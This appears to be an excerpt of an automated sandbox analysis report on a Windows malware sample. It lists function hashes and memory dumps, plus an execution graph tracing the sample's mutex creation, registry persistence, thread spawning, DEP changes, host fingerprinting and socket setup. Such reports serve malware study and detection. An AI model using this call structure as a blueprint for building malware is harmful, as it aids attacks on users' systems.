                                              • Opcode Fuzzy Hash: cec77b159c0ea83f857012d5b4ae8469a07a81413d6283470a563a47e63a9e61
                                              • Instruction Fuzzy Hash: 5A318E745083819FD724CF25C884B5BBBF0FBC8704F00892EE9A587392E7789548CB9A
                                              Function 004063FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Message$get_FirewallEnabled failed: 0x%08lx
                                              • API String ID: 3519838083-3669246561
                                              • Opcode ID: f2581173cd54d603dfba8b1a4541f22ab2f090637743848d00e32e1f658e4987
                                              • Instruction ID: f105753d09791b4c671eee8698da4191506a5d5f18efc9bd2aac6efeec02826c
                                              • Opcode Fuzzy Hash: f2581173cd54d603dfba8b1a4541f22ab2f090637743848d00e32e1f658e4987
                                              • Instruction Fuzzy Hash: B911E671600108FFCB00EFA9C881ADE77A5AF48314F10827EF55AE71D1D7749A44C754
                                              Function 00409D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Do you really want to cancel?$Question
                                              • API String ID: 3519838083-3547955172
                                              • Opcode ID: 6fc31e5780a0badf5ea5a55fa3ab369bd68f04cf11b64c784a4b1dd1a9fc8802
                                              • Instruction ID: bd53129a67d079509a4369cd051eac07b3f348f5042458483638bc8e6ad9a035
                                              • Opcode Fuzzy Hash: 6fc31e5780a0badf5ea5a55fa3ab369bd68f04cf11b64c784a4b1dd1a9fc8802
                                              • Instruction Fuzzy Hash: 3401B531C00199ABCB10E795C942FEEBB749F11324F60425BE461721D2D7781B48C695
                                              Function 00407D83 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • 2.8 (no debug,ANSI,Visual C++,wx containers,compatible with 2.6), xrefs: 00407D94
                                              • your program, xrefs: 00407D8F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: 2.8 (no debug,ANSI,Visual C++,wx containers,compatible with 2.6)$your program
                                              • API String ID: 3519838083-1349685460
                                              • Opcode ID: 61e011678f064aa3f66947369e1c99ca4cbf35dee3a15426a5a2a6d62de62783
                                              • Instruction ID: 1523a34304f5ca219838624e3a2edcca56625a63025bcd44c9342f38124bf159
                                              • Opcode Fuzzy Hash: 61e011678f064aa3f66947369e1c99ca4cbf35dee3a15426a5a2a6d62de62783
                                              • Instruction Fuzzy Hash: C6E09270E505699ACB10AFA54C427DE7AA09B04748F10453FE051E72C1DBBC594087ED

                                              Execution Graph

                                              Execution Coverage:3.4%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:5.6%
                                              Total number of Nodes:1472
                                              Total number of Limit Nodes:52
                                              execution_graph 58235 c2bcc 58236 c2bdf 58235->58236 58237 c2bd7 58235->58237 58238 c2beb 58236->58238 58243 c15d3 58236->58243 58253 c3315 28 API calls 2 library calls 58237->58253 58241 c2bdd 58245 f360d 58243->58245 58246 c2be9 58245->58246 58248 f362e std::_Facet_Register 58245->58248 58254 fa88c 58245->58254 58261 102200 7 API calls 2 library calls 58245->58261 58249 f3dec std::_Facet_Register 58248->58249 58262 f7bd7 RaiseException 58248->58262 58263 f7bd7 RaiseException 58249->58263 58251 f3e09 58253->58241 58260 106aff _strftime 58254->58260 58255 106b3d 58265 105354 20 API calls _free 58255->58265 58257 106b28 RtlAllocateHeap 58258 106b3b 58257->58258 58257->58260 58258->58245 58260->58255 58260->58257 58264 102200 7 API calls 2 library calls 58260->58264 58261->58245 58262->58249 58263->58251 58264->58260 58265->58258 58266 f39be 58267 f39ca __FrameHandler3::FrameUnwindToState 58266->58267 58298 f36b3 58267->58298 58269 f39d1 58270 f3b24 58269->58270 58273 f39fb 58269->58273 58598 f3b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 58270->58598 58272 f3b2b 58599 1026be 28 API calls _abort 58272->58599 58286 f3a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 58273->58286 58592 1034d1 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 58273->58592 58275 f3b31 58600 102670 28 API calls _abort 58275->58600 58278 f3a14 58280 f3a1a 58278->58280 58593 103475 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 58278->58593 58279 f3b39 58282 f3a9b 58309 f3c5e 58282->58309 58286->58282 58594 fedf4 38 API calls 2 library calls 58286->58594 58292 f3abd 58292->58272 58293 f3ac1 58292->58293 58294 f3aca 58293->58294 58596 102661 28 API calls _abort 58293->58596 58597 f3842 13 API calls 2 library calls 58294->58597 58297 f3ad2 58297->58280 58299 f36bc 58298->58299 58601 f3e0a IsProcessorFeaturePresent 58299->58601 58301 f36c8 58602 f79ee 10 API calls 3 library calls 58301->58602 58303 f36cd 58304 f36d1 58303->58304 58603 10335e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 58303->58603 58304->58269 58306 f36da 58307 f36e8 58306->58307 58604 f7a17 8 API calls 3 library calls 58306->58604 58307->58269 58605 f6050 58309->58605 58312 f3aa1 58313 103422 58312->58313 58607 10ddc9 58313->58607 58315 f3aaa 58318 cd767 58315->58318 58316 10342b 58316->58315 58611 10e0d3 38 API calls 58316->58611 58613 dbce3 LoadLibraryA GetProcAddress 58318->58613 58320 cd783 GetModuleFileNameW 58618 ce168 58320->58618 58322 cd79f 58633 c1fbd 58322->58633 58325 c1fbd 28 API calls 58326 cd7bd 58325->58326 58637 dafc3 58326->58637 58330 cd7cf 58662 c1d8c 58330->58662 58332 cd7d8 58333 cd7eb 58332->58333 58334 cd835 58332->58334 58919 ce986 111 API calls 58333->58919 58668 c1d64 58334->58668 58337 cd845 58340 c1d64 28 API calls 58337->58340 58338 cd7fd 58339 c1d64 28 API calls 58338->58339 58343 cd809 58339->58343 58341 cd864 58340->58341 58673 c4cbf 58341->58673 58920 ce937 68 API calls 58343->58920 58344 cd873 58677 c5ce6 58344->58677 58347 cd87f 58680 c1eef 58347->58680 58348 cd824 58921 ce155 68 API calls 58348->58921 58351 cd88b 58684 c1eea 58351->58684 58353 c1eea 26 API calls 58355 cdc9f 58353->58355 58354 cd894 58356 c1eea 26 API calls 58354->58356 58595 f3c94 GetModuleHandleW 58355->58595 58357 cd89d 58356->58357 58358 c1d64 28 API calls 58357->58358 58359 cd8a6 58358->58359 58688 c1ebd 58359->58688 58361 cd8b1 58362 c1d64 28 API calls 58361->58362 58363 cd8ca 58362->58363 58364 c1d64 28 API calls 58363->58364 58365 cd8e5 58364->58365 58366 cd946 58365->58366 58922 c85b4 58365->58922 58368 c1d64 28 API calls 58366->58368 58383 ce134 58366->58383 58373 cd95d 58368->58373 58369 cd912 58370 c1eef 26 API calls 58369->58370 58371 cd91e 58370->58371 58372 c1eea 26 API calls 58371->58372 58375 cd927 58372->58375 58374 cd9a4 58373->58374 58378 d24b7 3 API calls 58373->58378 58692 cbed7 58374->58692 58926 d24b7 RegOpenKeyExA 58375->58926 58377 cd9aa 58379 cd82d 58377->58379 58695 da463 58377->58695 58384 cd988 58378->58384 58379->58353 58382 cd9c5 58385 cda18 58382->58385 58712 c697b 58382->58712 59004 d2902 30 API calls 58383->59004 58384->58374 58929 d2902 30 API calls 58384->58929 58387 c1d64 28 API calls 58385->58387 58390 cda21 58387->58390 58399 cda2d 58390->58399 58400 cda32 58390->58400 58392 ce14a 59005 d12b5 64 API calls ___scrt_fastfail 58392->59005 58393 cd9ee 58398 c1d64 28 API calls 58393->58398 58394 cd9e4 58930 c699d 30 API calls 58394->58930 58407 cd9f7 58398->58407 58933 c69ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 58399->58933 58404 c1d64 28 API calls 58400->58404 58401 cd9e9 58931 c64d0 97 API calls 58401->58931 58405 cda3b 58404->58405 58716 dae08 58405->58716 58407->58385 58410 cda13 58407->58410 58408 cda46 58720 c1e18 58408->58720 58932 c64d0 97 API calls 58410->58932 58411 cda51 58724 c1e13 58411->58724 58414 cda5a 58415 c1d64 28 API calls 58414->58415 58416 cda63 58415->58416 58417 c1d64 28 API calls 58416->58417 58418 cda7d 58417->58418 58419 c1d64 28 API calls 58418->58419 58420 cda97 58419->58420 58421 c1d64 28 API calls 58420->58421 58422 cdab0 58421->58422 58423 cdb1d 58422->58423 58424 c1d64 28 API calls 58422->58424 58425 cdb2c 58423->58425 58431 cdcaa ___scrt_fastfail 58423->58431 58429 cdac5 _wcslen 58424->58429 58426 cdb35 58425->58426 58454 cdbb1 ___scrt_fastfail 58425->58454 58427 c1d64 28 API calls 58426->58427 58428 cdb3e 58427->58428 58430 c1d64 28 API calls 58428->58430 58429->58423 58433 c1d64 28 API calls 58429->58433 58432 cdb50 58430->58432 58993 d265d RegOpenKeyExA 58431->58993 58436 c1d64 28 API calls 58432->58436 58434 cdae0 58433->58434 58437 c1d64 28 API calls 58434->58437 58438 cdb62 58436->58438 58439 cdaf5 58437->58439 58442 c1d64 28 API calls 58438->58442 58934 cc89e 58439->58934 58440 cdcef 58441 c1d64 28 API calls 58440->58441 58443 cdd16 58441->58443 58445 cdb8b 58442->58445 58738 c1f66 58443->58738 58448 c1d64 28 API calls 58445->58448 58447 c1e18 26 API calls 58450 cdb14 58447->58450 58451 cdb9c 58448->58451 58453 c1e13 26 API calls 58450->58453 58991 cbc67 45 API calls _wcslen 58451->58991 58452 cdd25 58742 d26d2 RegCreateKeyA 58452->58742 58453->58423 58728 d28a2 58454->58728 58458 cdbac 58458->58454 58460 cdc45 ctype 58463 c1d64 28 API calls 58460->58463 58461 c1d64 28 API calls 58462 cdd47 58461->58462 58748 fa5e7 58462->58748 58464 cdc5c 58463->58464 58464->58440 58468 cdc70 58464->58468 58467 cdd5e 58996 dbeb0 86 API calls ___scrt_fastfail 58467->58996 58470 c1d64 28 API calls 58468->58470 58469 cdd81 58474 c1f66 28 API calls 58469->58474 58472 cdc7e 58470->58472 58475 dae08 28 API calls 58472->58475 58473 cdd65 CreateThread 58473->58469 59746 dc96f 10 API calls 58473->59746 58476 cdd96 58474->58476 58477 cdc87 58475->58477 58478 c1f66 28 API calls 58476->58478 58992 ce219 109 API calls 58477->58992 58480 cdda5 58478->58480 58752 da686 58480->58752 58481 cdc8c 58481->58440 58483 cdc93 58481->58483 58483->58379 58485 c1d64 28 API calls 58486 cddb6 58485->58486 58487 c1d64 28 API calls 58486->58487 58488 cddcb 58487->58488 58489 c1d64 28 API calls 58488->58489 58490 cddeb 58489->58490 58491 fa5e7 _strftime 42 API calls 58490->58491 58492 cddf8 58491->58492 58493 c1d64 28 API calls 58492->58493 58494 cde03 58493->58494 58495 c1d64 28 API calls 58494->58495 58496 cde14 58495->58496 58497 c1d64 28 API calls 58496->58497 58498 cde29 58497->58498 58499 c1d64 28 API calls 58498->58499 58500 cde3a 58499->58500 58501 cde41 StrToIntA 58500->58501 58776 c9517 58501->58776 58504 c1d64 28 API calls 58505 cde5c 58504->58505 58506 cde68 58505->58506 58507 cdea1 58505->58507 58997 f360d 22 API calls 3 library calls 58506->58997 58510 c1d64 28 API calls 58507->58510 58509 cde71 58511 c1d64 28 API calls 58509->58511 58512 cdeb1 58510->58512 58513 cde84 58511->58513 58515 cdebd 58512->58515 58516 cdef9 58512->58516 58514 cde8b CreateThread 58513->58514 58514->58507 59744 d9128 102 API calls 2 library calls 58514->59744 58998 f360d 22 API calls 3 library calls 58515->58998 58518 c1d64 28 API calls 58516->58518 58520 cdf02 58518->58520 58519 cdec6 58521 c1d64 28 API calls 58519->58521 58523 cdf6c 58520->58523 58524 cdf0e 58520->58524 58522 cded8 58521->58522 58525 cdedf CreateThread 58522->58525 58526 c1d64 28 API calls 58523->58526 58527 c1d64 28 API calls 58524->58527 58525->58516 59749 d9128 102 API calls 2 library calls 58525->59749 58528 cdf75 58526->58528 58529 cdf1e 58527->58529 58531 cdfba 58528->58531 58532 cdf81 58528->58532 58530 c1d64 28 API calls 58529->58530 58534 cdf33 58530->58534 58801 da7a2 GetComputerNameExW GetUserNameW 58531->58801 58533 c1d64 28 API calls 58532->58533 58536 cdf8a 58533->58536 58999 cc854 31 API calls 58534->58999 58542 c1d64 28 API calls 58536->58542 58538 c1e18 26 API calls 58540 cdfce 58538->58540 58541 c1e13 26 API calls 58540->58541 58544 cdfd7 58541->58544 58545 cdf9f 58542->58545 58543 cdf46 58546 c1e18 26 API calls 58543->58546 58547 cdfe0 SetProcessDEPPolicy 58544->58547 58548 cdfe3 CreateThread 58544->58548 58555 fa5e7 _strftime 42 API calls 58545->58555 58549 cdf52 58546->58549 58547->58548 58550 cdff8 CreateThread 58548->58550 58551 ce004 58548->58551 59717 ce54f 58548->59717 58552 c1e13 26 API calls 58549->58552 58550->58551 59745 d0f36 137 API calls 58550->59745 58553 ce00d CreateThread 58551->58553 58554 ce019 58551->58554 58556 cdf5b CreateThread 58552->58556 58553->58554 59747 d1524 38 API calls ___scrt_fastfail 58553->59747 58558 ce073 58554->58558 58560 c1f66 28 API calls 58554->58560 58557 cdfac 58555->58557 58556->58523 59748 c196b 49 API calls _strftime 58556->59748 59000 cb95c 7 API calls 58557->59000 58812 d246e RegOpenKeyExA 58558->58812 58561 ce046 58560->58561 59001 c4c9e 28 API calls 58561->59001 58565 ce053 58566 c1f66 28 API calls 58565->58566 58568 ce062 58566->58568 58567 ce12a 58823 ccbac 58567->58823 58571 da686 79 API calls 58568->58571 58570 dae08 28 API calls 58573 ce0a4 58570->58573 58574 ce067 58571->58574 58815 d2584 RegOpenKeyExW 58573->58815 58576 c1eea 26 API calls 58574->58576 58576->58558 58579 c1e13 26 API calls 58582 ce0c5 58579->58582 58580 ce0ed DeleteFileW 58581 ce0f4 58580->58581 58580->58582 58584 dae08 28 API calls 58581->58584 58582->58580 58582->58581 58583 ce0db Sleep 58582->58583 59002 c1e07 58583->59002 58586 ce104 58584->58586 58820 d297a RegOpenKeyExW 58586->58820 58589 c1e13 26 API calls 58590 ce121 58589->58590 58591 c1e13 26 API calls 58590->58591 58591->58567 58592->58278 58593->58286 58594->58282 58595->58292 58596->58294 58597->58297 58598->58272 58599->58275 58600->58279 58601->58301 58602->58303 58603->58306 58604->58304 58606 f3c71 GetStartupInfoW 58605->58606 58606->58312 58608 10ddd2 58607->58608 58609 10dddb 58607->58609 58612 10dcc8 51 API calls 4 library calls 58608->58612 58609->58316 58611->58316 58612->58609 58614 dbd22 LoadLibraryA GetProcAddress 58613->58614 58615 dbd12 GetModuleHandleA GetProcAddress 58613->58615 58616 dbd4b 32 API calls 58614->58616 58617 dbd3b LoadLibraryA GetProcAddress 58614->58617 58615->58614 58616->58320 58617->58616 59006 da63f FindResourceA 58618->59006 58621 fa88c ___crtLCMapStringA 21 API calls 58622 ce192 _Yarn 58621->58622 59009 c1f86 58622->59009 58625 c1eef 26 API calls 58626 ce1b8 58625->58626 58627 c1eea 26 API calls 58626->58627 58628 ce1c1 58627->58628 58629 fa88c ___crtLCMapStringA 21 API calls 58628->58629 58630 ce1d2 _Yarn 58629->58630 59013 c6052 58630->59013 58632 ce205 58632->58322 58634 c1fcc 58633->58634 59021 c2501 58634->59021 58636 c1fea 58636->58325 58657 dafd6 58637->58657 58638 db046 58639 c1eea 26 API calls 58638->58639 58640 db078 58639->58640 58641 c1eea 26 API calls 58640->58641 58643 db080 58641->58643 58642 db048 58644 c3b60 28 API calls 58642->58644 58646 c1eea 26 API calls 58643->58646 58647 db054 58644->58647 58648 cd7c6 58646->58648 58649 c1eef 26 API calls 58647->58649 58658 ce8bd 58648->58658 58651 db05d 58649->58651 58650 c1eef 26 API calls 58650->58657 58653 c1eea 26 API calls 58651->58653 58652 c1eea 26 API calls 58652->58657 58654 db065 58653->58654 59030 dbfa9 28 API calls 58654->59030 58657->58638 58657->58642 58657->58650 58657->58652 59026 c3b60 58657->59026 59029 dbfa9 28 API calls 58657->59029 58659 ce8ca 58658->58659 58661 ce8da 58659->58661 59047 c200a 26 API calls 58659->59047 58661->58330 58664 c200a 58662->58664 58663 c203a 58663->58332 58664->58663 59048 c2654 26 API calls 58664->59048 58666 c202b 59049 c26ba 26 API calls _Deallocate 58666->59049 58669 c1d6c 58668->58669 58670 c1d74 58669->58670 59050 c1fff 28 API calls 58669->59050 58670->58337 58674 c4ccb 58673->58674 59051 c2e78 58674->59051 58676 c4cee 58676->58344 59060 c4bc4 58677->59060 58679 c5cf4 58679->58347 58681 c1efe 58680->58681 58683 c1f0a 58681->58683 59069 c21b9 26 API calls 58681->59069 58683->58351 58686 c21b9 58684->58686 58685 c21e8 58685->58354 58686->58685 59070 c262e 26 API calls _Deallocate 58686->59070 58690 c1ec9 58688->58690 58689 c1ee4 58689->58361 58690->58689 58691 c2325 28 API calls 58690->58691 58691->58689 59071 c1e8f 58692->59071 58694 cbee1 CreateMutexA GetLastError 58694->58377 59073 db15b 58695->59073 58700 c1eef 26 API calls 58701 da49f 58700->58701 58702 c1eea 26 API calls 58701->58702 58703 da4a7 58702->58703 58704 da4fa 58703->58704 58705 d2513 31 API calls 58703->58705 58704->58382 58706 da4cd 58705->58706 58707 da4d8 StrToIntA 58706->58707 58708 da4e6 58707->58708 58709 da4ef 58707->58709 59081 dc102 28 API calls 58708->59081 58710 c1eea 26 API calls 58709->58710 58710->58704 58713 c698f 58712->58713 58714 d24b7 3 API calls 58713->58714 58715 c6996 58714->58715 58715->58393 58715->58394 58717 dae1c 58716->58717 59082 cb027 58717->59082 58719 dae24 58719->58408 58721 c1e27 58720->58721 58723 c1e33 58721->58723 59091 c2121 26 API calls 58721->59091 58723->58411 58726 c2121 58724->58726 58725 c2150 58725->58414 58726->58725 59092 c2718 26 API calls _Deallocate 58726->59092 58729 d28c0 58728->58729 58730 c6052 28 API calls 58729->58730 58731 d28d5 58730->58731 58732 c1fbd 28 API calls 58731->58732 58733 d28e5 58732->58733 58734 d26d2 29 API calls 58733->58734 58735 d28ef 58734->58735 58736 c1eea 26 API calls 58735->58736 58737 d28fc 58736->58737 58737->58460 58739 c1f6e 58738->58739 59093 c2301 58739->59093 58743 d26eb 58742->58743 58744 d2722 58742->58744 58747 d26fd RegSetValueExA RegCloseKey 58743->58747 58745 c1eea 26 API calls 58744->58745 58746 cdd3b 58745->58746 58746->58461 58747->58744 58749 fa600 _strftime 58748->58749 59097 f993e 58749->59097 58753 da69c GetLocalTime 58752->58753 58754 da737 58752->58754 58756 c4cbf 28 API calls 58753->58756 58755 c1eea 26 API calls 58754->58755 58758 da73f 58755->58758 58757 da6de 58756->58757 58759 c5ce6 28 API calls 58757->58759 58760 c1eea 26 API calls 58758->58760 58761 da6ea 58759->58761 58762 cddaa 58760->58762 59131 c27cb 58761->59131 58762->58485 58764 da6f6 58765 c5ce6 28 API calls 58764->58765 58766 da702 58765->58766 59134 c6478 76 API calls 58766->59134 58768 da710 58769 c1eea 26 API calls 58768->58769 58770 da71c 58769->58770 58771 c1eea 26 API calls 58770->58771 58772 da725 58771->58772 58773 c1eea 26 API calls 58772->58773 58774 da72e 58773->58774 58775 c1eea 26 API calls 58774->58775 58775->58754 58777 c9536 _wcslen 58776->58777 58778 c9558 58777->58778 58779 c9541 58777->58779 58780 cc89e 31 API calls 58778->58780 58781 cc89e 31 API calls 58779->58781 58782 c9560 58780->58782 58783 c9549 58781->58783 58784 c1e18 26 API calls 58782->58784 58785 c1e18 26 API calls 58783->58785 58786 c956e 58784->58786 58787 c9553 58785->58787 58788 c1e13 26 API calls 58786->58788 58789 c1e13 26 API calls 58787->58789 58790 c9576 58788->58790 58791 c95ad 58789->58791 59154 c856b 28 API calls 58790->59154 59139 c9837 58791->59139 58794 c9588 59155 c28cf 58794->59155 58797 c9593 58798 c1e18 26 API calls 58797->58798 58799 c959d 58798->58799 58800 c1e13 26 API calls 58799->58800 58800->58787 59334 c3b40 58801->59334 58805 da7fd 58806 c28cf 28 API calls 58805->58806 58807 da807 58806->58807 58808 c1e13 26 API calls 58807->58808 58809 da810 58808->58809 58810 c1e13 26 API calls 58809->58810 58811 cdfc3 58810->58811 58811->58538 58813 d248f RegQueryValueExA RegCloseKey 58812->58813 58814 ce08b 58812->58814 58813->58814 58814->58567 58814->58570 58816 d25dd 58815->58816 58817 d25b0 RegQueryValueExW RegCloseKey 58815->58817 58818 c3b40 28 API calls 58816->58818 58817->58816 58819 ce0ba 58818->58819 58819->58579 58821 ce117 58820->58821 58822 d2992 RegDeleteValueW 58820->58822 58821->58589 58822->58821 58824 ccbc5 58823->58824 58825 d246e 3 API calls 58824->58825 58826 ccbcc 58825->58826 58830 ccbeb 58826->58830 59356 c1602 58826->59356 58828 ccbd9 59359 d27d5 RegCreateKeyA 58828->59359 58831 d3fd4 58830->58831 58832 d3feb 58831->58832 59376 daa73 58832->59376 58834 d3ff6 58835 c1d64 28 API calls 58834->58835 58836 d400f 58835->58836 58837 fa5e7 _strftime 42 API calls 58836->58837 58838 d401c 58837->58838 58839 d402e 58838->58839 58840 d4021 Sleep 58838->58840 58841 c1f66 28 API calls 58839->58841 58840->58839 58842 d403d 58841->58842 58843 c1d64 28 API calls 58842->58843 58844 d404b 58843->58844 58845 c1fbd 28 API calls 58844->58845 58846 d4053 58845->58846 58847 dafc3 28 API calls 58846->58847 58848 d405b 58847->58848 59380 c4262 WSAStartup 58848->59380 58850 d4065 58851 c1d64 28 API calls 58850->58851 58852 d406e 58851->58852 58853 c1d64 28 API calls 58852->58853 58914 d40ed 58852->58914 58854 d4087 58853->58854 58856 c1d64 28 API calls 58854->58856 58855 c1fbd 28 API calls 58855->58914 58857 d4098 58856->58857 58859 c1d64 28 API calls 58857->58859 58858 dafc3 28 API calls 58858->58914 58860 d40a9 58859->58860 58861 c1d64 28 API calls 58860->58861 58863 d40ba 58861->58863 58862 c85b4 28 API calls 58862->58914 58865 c1d64 28 API calls 58863->58865 58864 c1eef 26 API calls 58864->58914 58866 d40cb 58865->58866 58867 c1d64 28 API calls 58866->58867 58868 d40dd 58867->58868 59527 c4101 88 API calls 58868->59527 58870 c4cbf 28 API calls 58870->58914 58871 c1d64 28 API calls 58871->58914 58873 d4244 WSAGetLastError 59528 dbc76 30 API calls 58873->59528 58877 c1f66 28 API calls 58880 d4259 58877->58880 58880->58877 58881 da686 79 API calls 58880->58881 58883 c1d8c 26 API calls 58880->58883 58884 c1d64 28 API calls 58880->58884 58885 fa5e7 _strftime 42 API calls 58880->58885 58880->58914 58916 d4b22 CreateThread 58880->58916 58917 c1eea 26 API calls 58880->58917 58918 c1e13 26 API calls 58880->58918 59529 c4c9e 28 API calls 58880->59529 59530 ca767 84 API calls 58880->59530 59531 c47eb 98 API calls 58880->59531 58881->58880 58883->58880 58884->58880 58886 d4b80 Sleep 58885->58886 58886->58880 58887 c27cb 28 API calls 58887->58914 58888 c1f66 28 API calls 58888->58914 58889 da686 79 API calls 58889->58914 58892 c82dc 28 API calls 58892->58914 58893 100c51 26 API calls 58893->58914 58894 d265d 3 API calls 58894->58914 58895 d2513 31 API calls 58895->58914 58896 c3b40 28 API calls 58896->58914 58899 daec8 28 API calls 58899->58914 58900 dad46 28 API calls 58900->58914 58901 c1d64 28 API calls 58902 d44ed GetTickCount 58901->58902 58903 dad46 28 API calls 58902->58903 